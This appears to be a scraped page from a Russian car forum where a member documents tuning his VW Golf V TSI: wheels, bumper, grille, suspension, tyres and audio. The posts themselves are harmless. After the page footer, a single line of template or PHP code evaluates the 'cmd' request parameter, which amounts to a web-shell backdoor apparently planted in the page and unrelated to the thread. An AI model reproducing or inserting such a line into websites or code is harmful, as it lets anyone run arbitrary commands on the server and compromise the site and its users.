+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 26

Тема: Golf V Tsi


  1. #1
    Не ругайте, перенес свою темку с другого форума.. без правок)


    Постараюсь рассказывать об одном из первых тси купленных в мск :::[img]style_emoticons/<#EMO_DIR#>/smile.gif[/img])) кратко, лаконично и информативно) не судите строго [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]:::beer:

    вот такими мы были) с августа по март 2007 г.








  2. #2
    зимой были купленный диски Denver от гти, в плачевном состоянии, но с резиной на которой можно было откатать сезон...

    фото после покупки, но до ремонта (видимо у человека была бордюрная болезнь.)":[img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]







    и после ремонта:::[img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]))







    и на машине [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]))






  3. #3
    Далее, удачно был куплен, покрашен и инсталлирован бампер от ГТИ

    вот результат [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img])):::[img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]))








  4. #4
    поздней осенью подвернулась решетка без значка, для гт-спорт.., загорелся, махнулся с eNm&#39;ой....

    но после долгих раздумий и неудовлетворенности результатом было принято решение вернуть обратно грили ГТИ



    ЗЫ: типичный вид авто зимой) штамповка р15 + слой серой брони для ЛКП)))




  5. #5
    Поскольку зима это время "тюнинга" и учитывая мое недовольство дисками DENVER было решено их таки продать..., пока продавал - решал что купить, ковка была привлекательна всем кроме цены, а на двор кризис... так и возникло антикризисное решение...

    как и планировалось до покупки денвера, были приобретены итальянские реплики дисков от Audi RS4. Параметры 8х18 ЕТ45

    фото:









    вдохновили вот эти фотографии:
    Тык

    Тык


  6. #6
    далее "понеслать" как же можно поставить такие колеса на гольф с дорожным просветом как у трактора.., но учитывая кризис и проштудировав каталог Bilstein было принято компромиссное решение:

    - комплект амортизаторов серии B4 для спорт подвески гольф5, предусматривающие работу с пружинами -1,5 см (от Европы) в штатном режиме. Мысль была следующая... "-3 см. они некоторое время переживут.

    ЗЫ: конструкция и качество изготовления не оставляют сомнения в правильность выбора.

    ЗЗЫ: далее в планах пружины H&R или айбах.

    фото переднего:


  7. #7
    и недавно, как всегда исследуя интеренет, наткнулся на сказочное предложение по резине и не смог устоять)

    были приобретены 4 покрышки: Bridgstone Potenza GIII, размерности 235/40/18

    фото) в сравнении с 205/55/16 и отдельно:












  8. #8
    У меня обновочка, спешу похвастаться)))

    так получилось что решил улучшить звук в своем насочке) вернее не мог пройти мимо отличной цены на хорошо знакомый мне усилитель)
    вечером будут более качественные фотки. а пока анонс)
    пс: очень боялся что он не поместится в багажник.. )))) по ширине)




  9. #9
    Чудеса да и только0)))

    как меня радует наш народ)

    Ситуация: сижу и думаю..что бы такого придумать со штатной головой..чтобы звук был более или менее приличный.. и тут эврика&#33;

    Выяснилось что с тех пор как народ подсел на мп3...скидка на мою любимую магнитолу за 5 лет продаж достигла 70%))))))

    в 2004 покупал такую же..ха 450 баксов)

    ЗЫ: после установки вспомнил старый-дбрый Нак..теперь езжу и кайфую)
    ЗЗЫ: если есть желание высказатья по поводу кЕтая.. лучше закройте страницы))) этот кЕтай вас еще удивит)
    ЗЗЗЫ: нравится мне гораздо больше чем предыдущий пионер 88RS..., не говоря уже о штатной балалайке)

    Результат:)




  10. #10
    Анонс следующего выпуска...)
    Колпачки не ругать.. Забыл заказать)




+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}